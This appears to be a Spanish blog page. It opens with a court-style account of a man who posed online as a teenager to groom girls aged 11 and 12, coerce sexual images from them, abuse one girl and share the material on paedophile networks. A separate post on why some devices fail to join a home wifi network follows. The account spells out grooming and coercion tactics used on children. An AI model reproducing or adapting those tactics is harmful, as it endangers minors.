El procesado, desde el mes de mayo del año 2014 y hasta el mes de septiembre de 2014, entró en contacto telefónico vía WhatsApp con una niña de 11 años, de la que obtuvo su número por su hijo menor, que acudía al mismo centro escolar que ella. A través de la niña, el procesado consiguió los teléfonos de otras cinco menores, de entre 11 y 12 años.

El Ministerio Fiscal sostiene que el procesado se hacía pasar por un adolescente, llamado en unas ocasiones Manu y en otras José, y les hacía creer que vivía en León o Barcelona. En las distintas conversaciones que el procesado mantenía con ellas, les decía que estaba enamorado de cada una de ellas, que quería convertirse en su novio y les pedía a todas, aunque en conversaciones independientes, que le enviaran fotos vestidas, en bikini, desnudas, de sus pechos y órganos genitales. Tras un tiempo recibiendo estas fotos, y ganada ya su confianza, comenzó a pedirles que le enviaran vídeos de mayor contenido sexual.


El procesado envió a las menores cientos de mensajes de texto a cualquier hora del día, diciéndoles a cada una de ellas, de manera individual, que estaba enamorado de ellas, que sería capaz de quitarse la vida si no le demostraban lo que le querían enviándole esos vídeos, o también que terminaría con la relación si no accedían a ello.

El material que fue enviado por las menores al procesado era compartido por este con otros usuarios en las redes pedófilas, ya que tenía instalado el programa Ares, utilizado para descargar y compartir servidores de archivos por Internet, como se acreditó por parte de la Sección de Informática Forense perteneciente a la Unidad Central de Criminalística de la Policía Judicial de Madrid.


Asimismo, el procesado le dijo a una de las niñas -utilizando la identidad de Manu- que si le quería tenía que acostarse con su padre, presentándose el procesado, en fecha no determinada pero en todo caso entre el mes de mayo y septiembre de 2014, como "padre de Manu" y llegando a tener numerosos encuentros sexuales con la menor, unas veces en el domicilio de él y otras en su coche, entregando a la niña regalos que decían ser de su supuesto hijo Manu.


El procesado grabó todos esos actos y los compartió después con otros usuarios en las redes pedófilos (a través del programa Ares), como se acreditó por parte de la Sección de Informática Forense perteneciente a la Unidad Central de Criminalística de la Policía Judicial de Madrid.

domingo, 22 de mayo de 2016

Algunos equipos no se conectan a mi red wifi, ¿por qué me pasa?




Cada día es más habitual que los usuarios de telecomunicaciones utilicen la tecnología wifi para poder conectarse a internet desde cualquier lugar de su casa, y por ese motivo, también es cada vez más común que haya problemas en la conexión de los equipos domésticos a la red wifi del hogar, y que algún equipo no funcione.


            Una red wifi casera depende de 3 factores:
 
            1.- Banda de emisión / recepción del router, y de los equipos
 
            2.- Configuración del router y de los equipos
 
            3.- Cobertura
 
            Dichos factores hacen que, en ocasiones, puedan darse el problema de que falte conexión entre los elementos de la red, con el consiguiente perjuicio para el usuario.
 
            1.- Problemas con el sistema de radio que soporta el sistema wifi
 
            Si no se detecta la señal en los equipos que forman la red, el fallo podría deberse a que el router emite en una banda diferente a la del equipo, pues todo equipo dotado de wifi emite y recibe en la banda de 2,4 GHz, pero no todos lo hacen en la de 5 GHz.
 
            Para solucionarlo bastaría con asegurarse de que existe emisión de radio en la banda que use el equipo que deseamos conectar a la red wifi, descargándonos a un Smartphone una aplicación como ?wifi analyzer?, que detecta las emisiones de radio que dan soporte a las redes wifi y mirando si existe una emisión de radio de la red bajo prueba en la banda deseada (2,4 o 5 GHZ).
 
            Si usamos un Smartphone que soporte ambas bandas, no tendremos problemas, evidentemente, pero en el caso de que en nuestra red tengamos un router que emita en la banda de 5 GHZ y algún equipo sólo emita y reciba en la banda de 2,4 GHz (obligatoria para cualquier equipo dotado de wifi), se producirá el problema de que dicho dispositivo no se conectará a la red, teniendo algunos dispositivos conectados y otros que no lo estarán.
 
            En dicho caso, y si deseamos o necesitamos que todos los dispositivos estén conectados, nos veremos obligados a cambiar la banda a la de 2,4 GHz, para conseguir la compatibilidad necesaria para todos los equipos, perdiendo una velocidad importante en los equipos que sí operen en la banda de 5 GHz.
 
            2.- Problemas con la configuración de la red wifi
 
            Todos los equipos wifi tienen asignado un nombre para que el resto de equipos de la red los puedan identificar (especialmente el router que controla la red).
 
            Pero a veces se da la circunstancia de que al intentar conectarnos a nuestra red no la localizamos por ningún lado, pudiendo deberse dicho hecho a que los modernos router permiten ocultar el nombre de la red, entre otras cosas, como medida de seguridad, precisamente para que nadie pueda detectar nuestra red e intentar unirse o hackearla.
 
            En dicho caso, debería accederse a la configuración del router y hacer visible el nombre de la red, aunque luego se pueda ocultar de nuevo, una vez unidos los equipos necesarios a la red.
           
            3.- Falta de cobertura.
 
            En este caso, la falta de cobertura puede deberse a algo tan simple como que el emisor no esté conectado (se haya deshabilitado la emisión de wifi). Para saber si el wifi está conectado, basta con bajarse una aplicación como ?Wifi analyzer?, que detecta si existen emisiones en las bandas de 2,4 (en cualquier aparato con wifi) y de 5 GHz (en los móviles o aparatos que dispongan de esta banda, claro).
 
            Con un dispositivo en el que esté instalado la aplicación podremos detectar si la wifi del router está funcionando, pues situándonos junto al router conseguiremos una muchísima mayor potencia de emisión, de tal forma que la señal que emita el mismo será tan grande que detectaremos de una forma muy fácil si está encendido o apagado.
 
            Si se detecta una señal wifi de altísima potencia, sabremos que la wifi está conectada y que el problema para no tener conexión a la red se tiene que deber a otro factor de los señalados, como la configuración del router
            Si no se detecta señal, puede ser tan sencillo como que no esté conectado el emisor de wifi del router y, por tanto, no haya señal de radio que soporte la red.